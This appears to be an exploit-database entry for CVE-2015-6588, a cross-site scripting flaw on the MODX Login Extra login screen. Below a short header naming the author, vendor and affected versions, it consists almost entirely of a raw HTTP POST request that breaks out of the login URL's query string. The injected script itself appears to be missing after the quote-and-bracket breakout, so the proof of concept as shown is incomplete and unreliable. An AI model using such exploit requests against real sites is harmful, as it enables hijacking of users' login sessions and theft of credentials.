# Exploit Title: MODX Cross-Site Scripting on Login Screen # Date: 2015/11/24 # Exploit Author: fenceposterror # Vendor Homepage: http://modx.com # Version: MODX Login Extra before Version 1.9.1. # CVE : 2015-6588 POST /login.html?a"> HTTP/1.1 Host: vulnerable-installation.tld Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 74 username=admin&password=admin&returnUrl=%2Fde%2F&service=login&Login=Login